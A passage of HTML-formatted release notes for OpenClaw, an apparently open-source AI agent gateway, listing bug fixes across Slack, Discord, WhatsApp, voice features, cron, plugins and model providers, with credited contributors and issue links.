<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
<p>Providers/Google: keep Gemini thinking-signature-only stream chunks active during reasoning, so Gemini 3.1 Pro Preview replies no longer hit idle timeouts before visible text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368880968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76071" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76071/hovercard" href="https://github.com/openclaw/openclaw/issues/76071">#76071</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368997122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76080" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76080/hovercard" href="https://github.com/openclaw/openclaw/pull/76080">#76080</a>) Thanks @marcoschierhorn and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>CLI/skills: show per-agent model and command visibility in <code>openclaw skills check --agent</code>, and let doctor report or disable unavailable skills allowed for the default agent. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368251753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75983" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75983/hovercard" href="https://github.com/openclaw/openclaw/pull/75983">#75983</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Agents/tools: skip unavailable media generation and PDF tool factories from the live reply path when Gateway metadata and the active auth store prove no configured provider can back them, while keeping explicit config and auth-backed providers on the normal factory path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
